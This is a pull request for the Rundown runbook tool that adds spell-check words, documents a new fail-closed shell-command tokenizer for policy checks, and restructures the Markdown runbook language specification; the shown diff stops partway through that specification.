### PR TITLE
Refactor shell parser

### DIFF
--- a/cspell-dictionary.txt
+++ b/cspell-dictionary.txt
@@ -214,3 +214,4 @@ worktree
 worktrees
 xstate
 zod
+redir

--- a/cspell-dictionary.txt
+++ b/cspell-dictionary.txt
@@ -215,3 +215,4 @@ worktrees
 xstate
 zod
 redir
+gitevil

--- a/docs/reference/security.md
+++ b/docs/reference/security.md
@@ -291,7 +291,7 @@ rundown run deploy.runbook.md --deny-all
 
 ## Allow/Deny Lists
 
-Pattern matching uses [picomatch](https://github.com/micromatch/picomatch) for glob syntax. Command parsing uses [shell-quote](https://github.com/substack/shell-quote) to extract executables from complex shell commands.
+Pattern matching uses [picomatch](https://github.com/micromatch/picomatch) for glob syntax. Command parsing uses Rundown's policy tokenizer to extract executables from shell commands, including pipelines, redirects, command substitutions, and here-documents. Executable words that depend on runtime expansion are treated as dynamic and fail closed unless trust mode is enabled.
 
 ### Command Execution (run)
 

--- a/docs/spec/language.md
+++ b/docs/spec/language.md
@@ -2,444 +2,492 @@
 version: 1.0.0
 ---
 
-# Rundown Specification
+# Rundown Language Specification
 
-Rundown is a format for defining executable runbooks using Markdown. It combines human-readable instructions with machine-executable commands and deterministic control flow.
+## 1. Scope
 
-The key words "MUST", "MUST NOT", "REQUIRED", "SHALL", "SHALL NOT", "SHOULD", "SHOULD NOT", "RECOMMENDED", "MAY", and "OPTIONAL" in this document are to be interpreted as described in [RFC 2119](https://www.rfc-editor.org/rfc/rfc2119).
+Rundown is a Markdown-based DSL for executable runbooks. This specification
+defines valid Rundown document structure and core DSL semantics. CLI usage,
+output formats, policy configuration, and implementation architecture are out of
+scope except where required to define document validity.
 
-## 1. Document Structure
+## 2. Terminology
 
-A Rundown document (`.runbook.md`) is a Markdown file with an optional YAML frontmatter.
+The key words MUST, MUST NOT, REQUIRED, SHOULD, SHOULD NOT, and MAY are to be
+interpreted as described in [RFC 2119](https://www.rfc-editor.org/rfc/rfc2119).
 
-| Element | Markdown | Count | Description |
-| :--- | :--- | :--- | :--- |
-| **Title** | `# Title` | 0..1 | Document title (metadata). |
-| **Description** | Text | 0..1 | Optional description after title. |
-| **Steps** | `## ID Title` | 1..N | Top-level execution units. |
+| Term | Meaning |
+| --- | --- |
+| Document | One Markdown runbook file. |
+| Frontmatter | Optional YAML metadata before Markdown content. |
+| Step | Top-level executable unit, introduced by H2. |
+| Substep | Nested executable unit, introduced by H3. |
+| Body | Prompt, command, substeps, runbook-list shorthand, or FOR body. |
+| Result | Execution outcome: `PASS` or `FAIL`. |
+| Handler | A transition mapping a result to an action. |
+| Action | Control-flow effect such as `CONTINUE`, `STOP`, or `GOTO`. |
+| Directive | Structural bullet: `OUTPUTS`, `FOR`, or `DELEGATE`. |
 
-### 1.1 Hierarchy
-* **H1**: Metadata (Title).
-* **H2**: Step.
-* **H3**: Substep.
-* **H4+**: Invalid.
+## 3. Document Model
 
-### 1.2 Frontmatter
+A Rundown document is CommonMark-compatible Markdown with optional YAML
+frontmatter.
 
-Frontmatter fields beyond `name`, `description`, `version`, `author`, `tags`, `inputs`, `outputs`, and `required` are preserved (open schema). This allows forward-compatible extensions and user-defined metadata.
+| Element | Form | Cardinality | Rule |
+| --- | --- | --- | --- |
+| Frontmatter | YAML between `---` fences | 0..1 | MUST precede Markdown. |
+| Title | H1 | 0..1 | Metadata only. |
+| Description | Text between H1 and first H2 | 0..1 | Metadata only. |
+| Step | H2 | 1..N | Executable top-level unit. |
+| Substep | H3 | 0..N | Nested unit under a step. |
 
-The `required` field declares variable names that must be provided by the caller (via CLI flags, config, environment, or delegation). Each entry must be a valid template variable identifier matching `/^[a-zA-Z_][a-zA-Z0-9_]*$/`. Names listed in `required` must also be declared in `inputs`. Missing required variables produce a hard error during resolution.
+H4 and deeper headings are invalid.
 
-The `inputs` field declares the names of template variables the runbook accepts. It is a list of identifiers; entries do not carry values. Each name must match the identifier pattern `/^[a-zA-Z_][a-zA-Z0-9_]*$/`. Reserved runtime names (`step`, `index`, `context`, matched case-insensitively) are rejected. Values for declared inputs are supplied at runtime via CLI flags, environment, config files, delegation inheritance, or context outputs (see [§7 Context Passing](#7-context-passing-outputs)).
+### 3.1 Frontmatter
 
-The frontmatter `description` field provides a summary for runbook discovery and listing (`rd ls --all`). The `Runbook.description` in the parsed AST is derived from preamble text between the H1 title and first H2 step. These are independent values.
+Frontmatter is an open YAML object; unknown fields MUST be preserved.
 
-## 2. Steps
+| Field | Type | Rule |
+| --- | --- | --- |
+| `name` | string | Optional runbook identifier. |
+| `description` | string | Discovery/listing summary; independent from Markdown preamble. |
+| `version` | string | Optional document version. |
+| `author` | string | Optional author metadata. |
+| `tags` | string array | Optional discovery metadata. |
+| `inputs` | string array | Declares accepted variable names; does not provide values. |
+| `required` | string array | Names required at resolution; each MUST also appear in `inputs`. |
+| `outputs` | output declaration array | Terminal outputs captured at run completion. |
 
-Steps are the fundamental units of execution defined by H2 headers.
+Input and required names MUST match `/^[a-zA-Z_][a-zA-Z0-9_]*$/`. `step`,
+`index`, and `context` are reserved case-insensitively and MUST NOT appear in
+`inputs` or `required`. Missing required variables are resolution errors.
 
-### 2.1 Identifiers
-Steps must be identified sequentially or by name.
+### 3.2 Heading Hierarchy
 
-| Format | Type | Usage |
-| :--- | :--- | :--- |
-| `## 1` | Static | Sequential execution. Must start at 1. |
-| `## Name` | Named | GOTO target only. Skipped by default flow. |
+Valid hierarchy is H1 metadata, H2 steps, then H3 substeps. H3 headings belong to
+the nearest preceding H2 unless they use a qualified identifier. H4+ is invalid.
 
-**Reserved Names**: `NEXT`, `CONTINUE`, `DEFER`, `DELEGATE`, `COMPLETE`, `STOP`, `GOTO`, `RETRY`, `PASS`, `FAIL`, `YES`, `NO`, `ALL`, `ANY`, `BREAK`, `FOR`, `IN`, `TO`, `AT`.
+## 4. Identifiers
 
-Reserved word matching is case-sensitive. `NEXT` is reserved; `Next` and `NextStep` are valid.
+| Form | Example | Rule |
+| --- | --- | --- |
+| Numeric step | `## 1. Build` | MUST start at `1` and increase by `1` without gaps. |
+| Named step | `## Recover` | Valid `GOTO` target; skipped by default sequential flow. |
+| Qualified numeric substep | `### 1.1 Build DB` | Explicit parent step and substep. |
+| Bare numeric substep | `### 1 Build DB` | Parent is containing H2. |
+| Bare named substep | `### Repair` | Parent is containing H2. |
+| Qualified named substep | `### 1.Repair` | Parent is explicit. |
 
-Named identifiers must match `/^[A-Za-z_][A-Za-z0-9_]*$/`.
+Named identifiers MUST match `/^[A-Za-z_][A-Za-z0-9_]*$/`.
 
-### 2.2 Content Order
-Step content must appear in this strict order:
-1.  **OUTPUTS**: Context output declarations (optional). Must appear as a bullet item immediately after the step header.
-2.  **FOR Annotation**: Loop definition (optional). Must appear as a bullet item after directives.
-3.  **DELEGATE Annotation**: Delegation marker (optional). See [§4.3 DELEGATE](#43-delegate).
-4.  **Transitions**: Control flow rules (optional). Must appear as bullet items immediately after DELEGATE / FOR (or after directives if neither is present). Transitions must appear before any prompt text or body content.
-5.  **Prompt**: Text instructions.
-6.  **Body**: One of: Code Block or Substeps. A step-level runbook list is shorthand for implicit sequential substeps (`.1`, `.2`, ...).
+Reserved identifiers, matched exactly and case-sensitively: `NEXT`, `CONTINUE`,
+`DEFER`, `DELEGATE`, `COMPLETE`, `STOP`, `GOTO`, `RETRY`, `PASS`, `FAIL`,
+`YES`, `NO`, `ALL`, `ANY`, `BREAK`, `FOR`, `IN`, `TO`, `AT`.
 
-## 3. Step Bodies
+`NEXT` is reserved; `Next` and `NextStep` are valid.
 
-A step must contain exactly one type of body content.
+## 5. Step Content
 
-Steps are represented as a discriminated union on `kind`: `'base'` (prompt-only), `'command'` (executable code block), `'substeps'` (nested H3 steps), `'for'` (loop with substeps), `'prompted-for'` (unresolved FOR demoted to prompt-only).
+Step and substep content MUST appear in this order:
 
-### 3.1 Code Blocks
-Executes a command or displays a prompt. Max one code block per step.
+1. `OUTPUTS` directive.
+2. `FOR` directive.
+3. `DELEGATE` directive.
+4. Transitions.
+5. Prompt text.
+6. Body.
 
-| Tag | Type | Behavior |
-| :--- | :--- | :--- |
-| `bash`, `sh`, `shell` | Executable | Runs in shell. Exit 0 = PASS, else FAIL. |
-| `bash prompt`, `prompt` | Display | Output only. Not executed. |
-| `json`, `yaml`, etc. | Display | Output only. Treated as prompt. |
-| *(none)* | Invalid | Bare code fences (no info string) are rejected. |
+Each item is optional except the step heading itself. Misordered content is
+invalid.
 
-Code block info string tags are matched case-insensitively. `BASH`, `Bash`, and `bash` are all treated as executable.
+### 5.1 Body Kinds
 
-*   **Environment**: Inherits parent environment.
-*   **CWD**: Project root.
-*   **Stdio**: Inherited.
+A step or substep MUST contain exactly one body kind. A prompt-only step is a
+`base` body.
 
-### 3.2 Substeps
+| Kind | Form | Rule |
+| --- | --- | --- |
+| `base` | Prompt only | No executable body. |
+| `command` | One fenced code block | Executes or displays by info string. |
+| `substeps` | H3 children | Parent result is aggregated from children. |
+| `for` | `FOR` plus substeps | Repeats substeps per iteration. |
+| `prompted-for` | Unresolved template bound in `FOR` | Original `FOR` text is preserved as prompt text. |
 
-Nested steps defined by H3 (`###`) headers.
-* **Identifiers**: `### 1` (bare numeric), `### Name` (bare named), `### 1.1` (qualified numeric), or `### Step.Name` (qualified named). Bare forms inherit their parent step from document position — they belong to the H2 step they appear under. Qualified forms explicitly specify their parent.
-* **Strict H3 rule**: When a step contains any valid substep, all H3 headers within that step must be valid substep identifiers.
-* **Aggregation**: Parent step outcome is derived from substeps via transitions (`ALL`/`ANY`).
+Code blocks and substeps are mutually exclusive. Step-level runbook-list
+shorthand is canonicalized to implicit substeps and counts as `substeps`.
 
-### 3.3 Runbook List Shorthand
+### 5.2 Code Blocks
 
-List of external runbooks to execute.
+A step or substep MUST NOT contain more than one fenced code block. Bare fences
+without an info string are invalid.
+
+| Info string | Rule |
+| --- | --- |
+| `bash`, `sh`, `shell` | Execute in a shell; exit `0` => `PASS`, non-zero => `FAIL`. |
+| `bash prompt`, `prompt` | Display only. |
+| Other non-empty string | Display only. |
+
+Info string matching is case-insensitive. Executable blocks inherit the parent
+environment, run from the project root, and inherit stdio.
+
+### 5.3 Substeps
+
+If a step contains any valid substep, every H3 in that step MUST be a valid
+substep identifier. Parent results are derived from substep results through
+transitions and aggregation.
+
+### 5.4 Runbook List Shorthand
+
+A step-level list of runbook references is shorthand for implicit sequential
+substeps `.1`, `.2`, and so on. Example:
 
 ```markdown
-- ./deploy-db.runbook.md
-- ./deploy-api.runbook.md
+  ## 2. Review
+  - review-a.runbook.md
+  - review-b.runbook.md
 ```
 
-At step level, this syntax is canonicalized to implicit sequential substeps (`1`, `2`, ...), one workflow per substep.
-When step-level prompt text appears above this shorthand body, it is attached to the first generated implicit substep only.
-These two forms are execution-equivalent:
+This is equivalent to explicit substeps `2.1` and `2.2` with one runbook
+reference each. Prompt text above the shorthand attaches to the first generated
+substep only.
 
-```markdown
-## 2. Review the plan
-- review-technical-accuracy.runbook.md
-- review-structural-integrity.runbook.md
-```
+Runbook references MAY be literal targets or template references such as
+`{{ RunbookName }}`. Undefined template references are preserved as literal
+text. A runbook-list entry without nested `DELEGATE` is inline linkage: the
+child runbook executes in-session and its terminal result propagates to the
+parent substep.
 
-```markdown
-## 2. Review the plan
-### 2.1
-- review-technical-accuracy.runbook.md
-### 2.2
-- review-structural-integrity.runbook.md
-```
+### 5.5 Runtime Target Identity
 
-Runbook list entries may use template variable references (`{{ VarName }}`) instead of literal paths. These are resolved to concrete runbook target strings during the variable resolution phase. Undefined references are preserved as literal text, consistent with general template variable behavior.
+Canonical runtime identity is `step + substep + iteration`. Display notation
+such as `1.2.1` (`STEP.INDEX.SUBSTEP` inside `FOR`) is not authoring syntax and
+is not canonical.
 
-A runbook-list entry may carry a nested `- DELEGATE` bullet to mark that entry for delegation; see [§4.3 DELEGATE](#43-delegate).
+<a id="4-control-flow"></a>
 
-A runbook-list entry **without** a nested `- DELEGATE` bullet is *inline linkage*: the parent steps through the child runbook in the same process, and the child's terminal result auto-propagates back to the parent substep. Inline linkage and DELEGATE are the two execution boundaries for nested runbooks — inline keeps the walk in-session, DELEGATE dispatches it out-of-process via a token (see §4.3).
+## 6. Transitions and Actions
 
-### 3.4 Runtime Target Identity
-Runtime dispatch/completion identity is canonicalized as:
-
-`step + substep + iteration`
-
-Execution path notation such as `1.2.1` (`STEP.INDEX.SUBSTEP`) is display-only. It is neither authoring syntax nor a canonical identifier.
-
-## 4. Control Flow
-
-Control flow is defined by **Transitions** (conditions) and **Actions** (effects).
-
-### 4.1 Transitions
-Syntax: `- {RESULT} [{AGGREGATION}] {ACTION}`
-
-| Component | Values | Description |
-| :--- | :--- | :--- |
-| **Result** | `PASS` (`YES`), `FAIL` (`NO`) | Outcome of the step's body. |
-| **Aggregation** | `ALL`, `ANY` | For substeps. Step-level runbook-list shorthand is canonicalized to substeps. Default: `PASS ALL`, `FAIL ANY`. |
-
-Aggregation modifiers must form complementary pairs: `PASS ALL` with `FAIL ANY` (pessimistic — any failure stops), or `PASS ANY` with `FAIL ALL` (optimistic — only total failure stops). Non-complementary combinations are invalid because they create evaluation gaps (ALL/ALL) or overlaps (ANY/ANY).
-
-Transition keywords (`PASS`, `YES`, `FAIL`, `NO`) are matched as whole words in list items — the keyword must be followed by whitespace and an action. Words that merely start with a keyword (e.g., `NOTE`, `PASSING`) are not treated as transitions.
-
-**Aggregation semantics:** Aggregation always waits for all DEFER'd results before evaluating. `ALL`/`ANY` evaluates over the count of DEFER'd results, not total substeps/iterations. This mirrors `Promise.allSettled` semantics — all results are collected before the outcome is determined.
-
-**Defaults**:
-*   If only `PASS` defined: `FAIL` -> `STOP`.
-*   If only `FAIL` defined: `PASS` -> `CONTINUE`.
-*   If neither is defined: `PASS CONTINUE`, `FAIL STOP`.
-*   Substeps under aggregation or with runbook delegation default to `PASS DEFER`, `FAIL DEFER`.
-
-One-sided aggregation modifiers are rejected — both sides must be explicitly authored (e.g., `PASS ALL ... FAIL ANY ...`).
-
-### 4.2 Actions
-
-| Action | Context | Effect |
-| :--- | :--- | :--- |
-| `CONTINUE` | Step | Proceed to next step. |
-| `CONTINUE` | FOR Iteration-Level | Exit loop (result NOT accumulated). |
-| `DEFER` | Substep, FOR Iteration-Level | Pass result up one level for aggregation. |
-| `STOP [msg]` | Any | Terminate execution immediately (failure). |
-| `COMPLETE [msg]` | Any | Terminate execution immediately (success). |
-| `GOTO {Target}` | Any | Jump to step/substep (e.g., `1`, `Error`). |
-| `RETRY N Act` | Any | Retry N times, then perform Act (both required). |
-| `NEXT` | FOR Substep, FOR Iteration-Level | Skip to next iteration (no result accumulation). |
-| `BREAK` | FOR Substep, FOR Iteration-Level | Exit loop immediately. |
-
-> **Shorthand:** A standalone `- DEFER` bullet (without PASS/FAIL prefix) expands to `- PASS DEFER` + `- FAIL DEFER`. This is convenient for substeps where both outcomes should propagate to parent aggregation. DEFER is not valid at step level.
-
-> **RETRY syntax:** Both count and fallback action are required (e.g., `RETRY 3 STOP`). Nested RETRY (RETRY as fallback action) is invalid.
-
-GOTO targeting the containing step (self-reference) without an AT qualifier may create an infinite loop. Use RETRY for bounded re-execution.
-
-**GOTO Syntax**:
-*   `GOTO 3`: Jump to Step 3.
-*   `GOTO 3` (FOR step, no AT): Defaults to the loop's start value (e.g., `1` for `FOR 1 TO 10`, `5` for `FOR 5 TO 1`).
-*   `GOTO 3 AT 1`: Jump to Step 3, iteration 1 (if FOR step).
-*   `GOTO 3 AT {{Index}}`: Re-enter Step 3 at current iteration.
-
-> **Internal:** The compiler resolves step-to-step advancement using `CONTINUE` actions mapped to concrete next-step state IDs at compile time. `NEXT` is rejected as a GOTO target by the parser.
-
-### 4.3 DELEGATE
-
-Use `- DELEGATE` when the nested runbook should run **out-of-process** in a subagent. A runbook-list entry without `- DELEGATE` is inline linkage and runs in the same process — see [§3.3](#33-runbook-list-shorthand).
-
-`- DELEGATE` is a structural bullet annotation that marks substeps for delegation. When a DELEGATE step is entered, the execution engine auto-issues a delegation token for each marked substep and surfaces them in the `STEP_ENTERED` event's `delegateFrontier` field (an array of `{id, runbook, token}`). Subagents claim each token with `rd claim`, copy the returned `claim_id`, resolve with `rd pass --claim-id <claim_id>` or `rd fail --claim-id <claim_id>`, and the final resolution triggers auto-aggregation of the parent step's transition.
-
-**Syntax.** The annotation is bare — `DELEGATE foo` is a syntax error. DELEGATE accepts three equivalent forms:
-
-* **Step-level** — on the H2 step, propagates to all H3 substeps:
-    ```markdown
-    ## 1. Delegated work
-    - DELEGATE
-    - PASS ALL CONTINUE
-    - FAIL ANY STOP
-
-    ### 1.1 First task
-    - child-a.runbook.md
-    ```
-* **Per-substep** — on individual H3 substeps, applies only to the annotated substeps:
-    ```markdown
-    ### 1.1 First task
-    - DELEGATE
-    - child-a.runbook.md
-    ```
-* **Runbook-list shorthand** — nested under runbook-list entries (no H3 headers):
-    ```markdown
-    ## 1. Delegated work
-    - child-a.runbook.md
-      - DELEGATE
-    ```
-
-**Ordering.** `- DELEGATE` precedes transitions and prompt content. When a FOR clause is also present, `FOR ... IN ...` precedes `DELEGATE`.
-
-**Target requirement.** A DELEGATE substep must resolve to a runbook reference (either a `.runbook.md` entry or a template reference). A DELEGATE substep with no runbook target is a structural error.
-
-**Aggregation.** The final substep resolution auto-aggregates the parent step's transition. An explicit `rd collect` CLI invocation triggers aggregation (used when a DELEGATE step mixes delegated and non-delegated substeps, or to force aggregation without waiting for the final subagent callback). Repeat invocations surface `already-aggregated`; terminal drain states propagate result to the parent run via `handleParentCompletion`.
-
-**RETRY on DELEGATE.** `RETRY N Act` on a DELEGATE step is uniform: on retry, every delegated substep in the active frame is cancelled and re-issued with a fresh token, regardless of the substep's prior pass/fail result. Stale tokens return `TOKEN_CANCELLED` on `rd claim`. The `STEP_TRANSITIONED { action: 'RETRY', aggregated: true }` event signals the boundary; the subsequent `STEP_ENTERED` carries the new `delegateFrontier`. This matches §4.2 — `RETRY` re-executes the step's work, and for DELEGATE that work is the fan-out.
-
-## 5. Iteration (FOR)
-
-Steps annotated with `FOR` execute their substeps repeatedly.
-
-| Syntax | Description |
-| :--- | :--- |
-| `FOR var IN 1 TO N` | Named variable, ascending range. |
-| `FOR 1 TO N` | Unnamed, ascending range. |
-| `FOR var IN N TO 1` | Named variable, descending range. |
-| `FOR N TO 1` | Unnamed, descending range. |
-| `FOR var IN N` | Named variable, implicit start (1 TO N). |
-| `FOR N` | Unnamed, implicit start (1 TO N). |
-| `FOR var IN 1 TO {{Max}}` | Template-variable bound (expanded before parse). |
-| `FOR var IN {{source}}` | Named variable, data source (all items). |
-| `FOR var IN 1 TO N OF {{source}}` | Named variable, windowed data source. |
-
-*   **Direction**: When `start > end`, iteration descends (step −1). When `start <= end`, it ascends (step +1). Single-number shorthand (`FOR N`) always ascends from 1.
-*   **Limits**: Open-ended data source iteration is capped at 10,000 iterations. Numeric bounds are capped at 10,000 at parse time.
-*   **Source references**: `{{ source }}` in FOR clauses is NOT template-expanded. It is a data source identifier resolved at runtime. Template-variable bounds (`{{ Max }}`) ARE expanded before parsing.
-*   **Unresolved bounds**: When a template-variable bound in a FOR clause cannot be resolved (undefined variable), the step is demoted to `kind: 'prompted-for'` — a substeps-only step with no executable `forClause`. The original FOR text is preserved as prompt text. This allows an orchestrating agent to handle unresolved FOR bounds manually.
-*   **Named variable required**: Data source FOR clauses require a named variable. Unnamed syntax (`FOR {{source}}`) is invalid.
-* **Data sources**: Provided at runtime as arrays or file-backed JSON/JSONL sources. `file:` source values must stay within the project root after symlink resolution.
-*   **Constraint**: FOR steps MUST have substeps. Step-level runbook-list shorthand qualifies because it is canonicalized to implicit substeps.
-*   **Scope**: Loop variable available in substeps as `{{var}}`.
-*   **Aggregation**: Transitions on the parent FOR step evaluate the aggregate result of all iterations.
-*   **Iteration-level transitions**: Nested `PASS`/`FAIL` transitions under a `FOR` clause are stored on the `forClause.transitions` field and execute per iteration. Allowed actions: `DEFER` (default, loop back with accumulation), `NEXT` (loop back without accumulation), `CONTINUE` (exit loop), `BREAK` (exit loop), `GOTO`, `STOP`, `COMPLETE` (optionally wrapped by `RETRY`).
-* **CONTINUE at iteration scope**: At step level, CONTINUE proceeds to the next step. At FOR iteration level, CONTINUE exits the loop — the current iteration result is NOT accumulated (same as NEXT/BREAK), and execution continues with the step after the FOR step.
-*   **Nested bullet rule**: Nested bullets under `FOR` must be transition bullets; non-transition nested bullets are invalid and fail parse.
-*   **Retry order**: Iteration-level `RETRY` semantics are deterministic: retry first, then execute the exhausted action. RETRY is universal — it fires for ALL substep actions (including `BREAK` and `NEXT`) based on the iteration result, not the substep action. After retries are exhausted, the substep's action takes effect:
-    *   `BREAK` → exit loop (non-accumulating, same as NEXT)
-    *   `NEXT` → skip to next iteration (or aggregation at end, non-accumulating)
-    *   `DEFER`/`CONTINUE` → configured iteration-level transition applies
-* **Execution model**: Each iteration executes its substeps. Each substep produces a **result** (pass/fail). Substep **handlers** map results to **actions**. Only two actions are loop control: `NEXT` (advance to next iteration) and `BREAK` (exit loop). All other actions (`CONTINUE`, `GOTO`, `STOP`, `COMPLETE`) are general flow control that exit the loop as a side effect.
-
-**Iteration execution flow:**
+Transition syntax:
 
 ```text
-Substeps execute → each produces RESULT (pass/fail)
-                 → substep HANDLER maps RESULT to ACTION
-                 → DEFER'd results accumulate within iteration
-                 → after all substeps: iteration RESULT = aggregate of DEFER'd results
-                 → iteration-level HANDLER maps iteration RESULT to ACTION:
-
-    DEFER     → record iteration result, advance to next iteration
-    NEXT      → advance to next iteration (do NOT record result)
-    BREAK     → exit loop (do NOT record result) → step-level HANDLER
-    CONTINUE  → exit loop → step-level HANDLER (current iteration result NOT recorded)
-    GOTO/STOP/COMPLETE → exit loop, bypass step-level HANDLER entirely
-```
-
-**Result recording by action:**
-
-| Action | Loop Control? | Records Iteration Result | Step-Level Handler Fires |
-| :--- | :--- | :--- | :--- |
-| `DEFER` | No (accumulate + loop back) | Yes | After final iteration |
-| `NEXT` | Yes (skip + loop back) | No | After final iteration |
-| `BREAK` | Yes (exit) | No | Yes |
-| `CONTINUE` | No (flow control) | No | Yes |
-| `GOTO` | No (flow control) | No | No (bypassed) |
-| `STOP` | No (flow control) | No | No (bypassed) |
-| `COMPLETE` | No (flow control) | No | No (bypassed) |
-
-## 6. Templating
-
-Variables use Handlebars syntax: `{{variable}}`.
-
-Whitespace inside Handlebars delimiters is allowed: `{{ Step }}` resolves the same way as `{{Step}}`, and spacing does not change undefined-variable warning behavior or `{{context.vars.NAME}}` path resolution.
-
-| Source | Scope | Description |
-| :--- | :--- | :--- |
-| CLI (`--input`) | Global | Expanded at startup. |
-| `{{Step}}`, `{{step}}` | Step | Current execution identifier for this runbook context (e.g., `1`, `1.2`). |
-| `{{Index}}`, `{{index}}` | Loop | Current iteration number for this runbook context. |
-| `{{context.current.*}}` | Step/Loop | Canonical current runbook context: `step` (e.g., `3`), `substep` (e.g., `1`), `index` (e.g., `3`), `at` (e.g., `3.3.1` — `STEP.INDEX.SUBSTEP` inside a FOR loop, `STEP.SUBSTEP` otherwise). |
-| `{{context.parent.*}}` | Nested | Parent runbook structural context and template variables (`vars.*`). |
-| `{{context.ancestors.N.*}}` | Nested | Ancestor runbook contexts (`0` is nearest parent). |
-| `{{context.vars.NAME}}` | Global | User/config/frontmatter variable namespace. |
-| Loop Var | Loop | Current item/index (e.g., `{{batch}}`). |
-
-* **Undefined**: Preserved as literal text. A warning is emitted to stderr for each undefined variable.
-* **Evaluation**: Global vars expanded once; Step/Loop vars expanded per iteration.
-* **Parent variables**: `{{context.parent.vars.NAME}}` exposes the parent's resolved template variables. Only non-context keys propagate. Available via both chain (`context.parent.parent.vars.*`) and array (`context.ancestors.N.vars.*`) addressing.
-* **Depth limit**: Parent context chain addressing is capped at 32 levels (enforced on the delegation ancestor chain depth). Exceeding this limit produces an error.
-* **Path resolution**: Dotted paths are supported consistently (for example `{{context.parent.index}}`).
-* **Required variables**: The frontmatter `required` field declares variables that must be provided by the caller via CLI flags, config, environment bridge, or delegation inheritance. Names listed in `required` must also appear in `inputs:`. Missing required variables produce a hard error (`MISSING_REQUIRED_VARS`) during resolution. Reserved runtime names are also rejected in `required`.
-* **Reserved keys**: Runtime keys `step`, `index`, and `context` are reserved (matching is case-insensitive — any case variant such as `STEP`, `Step`, `INDEX` is also reserved) and cannot be overridden by user variables. The CLI rejects these names in frontmatter `inputs:`, `required`, `--input` flags, `--input-file` contents, and `.rundown/config.yaml` with an error diagnostic. Reserved names in `RD_INPUT_*` environment variables are silently skipped with a warning.
-* **Precedence** (highest to lowest): CLI flags → plugin variables (when resolving a plugin runbook) → `RD_INPUT_*` env vars → inherited delegation variables → `.rundown/config.yaml` → built-in defaults → INPUTS from context outputs store. See [docs/reference/runtime.md Variable Sources](../reference/runtime.md#variable-sources) for the full precedence table and operational details.
-* **Built-in variables**: Rundown provides a set of built-in variables (`Date`, `Branch`, `WorkPath`, `RunId`, `ContextId`, `Step`, `Index`, etc.). See [docs/reference/runtime.md Built-in Variables](../reference/runtime.md#built-in-variables) for the full table.
-* **Shell environment injection**: Built-in variables `WorkPath`, `ContextId`, and `RunId` are injected into each shell block's subprocess environment. See [docs/reference/runtime.md Shell Environment](../reference/runtime.md#shell-environment).
-
-## 7. Context Passing (OUTPUTS)
-
-Steps and substeps may declare OUTPUTS directives for passing data between steps and across delegation boundaries.
-
-### 7.1 OUTPUTS
-
-OUTPUTS declares values to inject into the runbook's live variable space after step completion.
-
-* **Evaluation trigger**: OUTPUTS are evaluated by the XState machine on both PASS and FAIL transitions when the completing step or substep declares outputs.
-* **Storage**: Step-level outputs merge into the machine's live `context.variables`; terminal frontmatter outputs are written to `context.finalVars` and persisted to `RunbookState.finalVars`.
-* **Expressions**: Each entry is evaluated against the step's resolved
-  runtime frame. Supported forms: naked file-backed channel (`VarName` only —
-  see "Naked form" below), Handlebars expressions (`{{ path "file.json" }}`),
-  quoted literals (`"value"` — may embed Handlebars templates, e.g.
-  `"{{ Index }}"`), and bare variable references (`VarName value`).
-* **Naked form (file-backed channel)**: An OUTPUTS entry with no expression
-  (just the name) at step or substep level activates a file-backed output
-  channel. Before the step's command spawns, Rundown creates an empty file
-  whose path includes the active scope tiers in this order: step id, optional
-  substep id, optional FOR iteration index, then `<VarName>`. The three
-  resulting paths are:
-
-  | Scope | Path |
-  |---|---|
-  | Step | `.rundown/runs/<runId>/outputs/<stepId>/<VarName>` |
-  | Substep | `.rundown/runs/<runId>/outputs/<stepId>/<substepId>/<VarName>` |
-  | FOR iteration (in substep) | `.rundown/runs/<runId>/outputs/<stepId>/<substepId>/<iteration>/<VarName>` |
-
-  Rundown injects `RD_OUTPUTS_<VarName>=<absolute-path>` into the command's
-  environment (after policy filtering, rundown-wins). When the command exits,
-  Rundown reads the file, trims trailing whitespace and newlines, and merges
-  the value into `context.variables` using the same precedence as
-  expression-form outputs. UTF-8 only; missing, empty, or non-UTF-8 content
-  is logged and omitted (best-effort, transition not rolled back).
-* **Best-effort**: OUTPUTS evaluation is non-fatal. Failed expressions are omitted from the stored result and logged; the step transition is not rolled back.
-* **Merge semantics**: Outputs merge into the existing live variable space — new keys are added, existing keys are overwritten.
-* **Status visibility**: The `rd status` command includes a `vars` field that exposes the current merged variable space (template vars + step outputs).
-
-### 7.2 Frontmatter `outputs:`
-
-The frontmatter `outputs:` field declares variables to capture at run completion and write to `state.finalVars`.
-
-*   **Evaluation timing**: Evaluated when the runbook reaches a terminal machine transition (`COMPLETE` or `STOPPED`).
-*   **Variable space**: Evaluated against the full merged variable space at termination time (template vars + accumulated step outputs + active step/index frame).
-*   **Cross-runbook forwarding**: When a child runbook completes, its `state.finalVars` are forwarded to the parent's live variable space via `SET_VARIABLES`, making the child's outputs available to subsequent parent steps.
-
-### 7.3 Delegation Inheritance
-
-Children in a delegation tree inherit the parent's `ContextId` via `--input`, providing a shared identity. Step OUTPUTS accumulate in `state.variables` throughout execution; frontmatter `outputs:` at termination produce `state.finalVars` which propagate to the parent actor on completion.
-
-### 7.4 Example: write-plan / execute-plan
-
-A parent runbook produces a plan file and delegates to a child runbook that consumes it. Both share a `ContextId` through delegation inheritance (see [§7.3](#73-delegation-inheritance) for the hand-off contract — the child automatically inherits the parent's `ContextId` via `--input`).
-
-Parent (`write-plan.runbook.md`):
-
-```markdown
-## 1. Write the plan
-- OUTPUTS
-  - PlanPath {{ path "plan.md" }}
 - PASS CONTINUE
-
-Draft the plan and save it to `{{ path "plan.md" }}`.
-
-## 2. Hand off
-- ./execute-plan.runbook.md
+- FAIL STOP
+- PASS ALL CONTINUE
+- FAIL ANY STOP
 ```
 
-Child (`execute-plan.runbook.md`):
+`YES` aliases `PASS`; `NO` aliases `FAIL`. Transition keywords MUST match whole
+words in list items; prefixes such as `PASSING` are not transitions.
 
-```markdown
----
-name: execute-plan
-inputs:
-  - PlanPath
-required:
-  - PlanPath
----
+### 6.1 Aggregation
 
-## 1. Execute
-- PASS COMPLETE
+Aggregation modifiers apply to substep and `FOR` parents.
 
-Execute the plan stored at `{{ PlanPath }}`.
-```
+| Pair | Meaning |
+| --- | --- |
+| `PASS ALL` with `FAIL ANY` | Pessimistic aggregation. |
+| `PASS ANY` with `FAIL ALL` | Optimistic aggregation. |
 
-Flow:
+Only complementary pairs are valid. `ALL`/`ALL`, `ANY`/`ANY`, and one-sided
+aggregation modifiers are invalid. Aggregation waits for all deferred results
+and evaluates only the deferred result set.
 
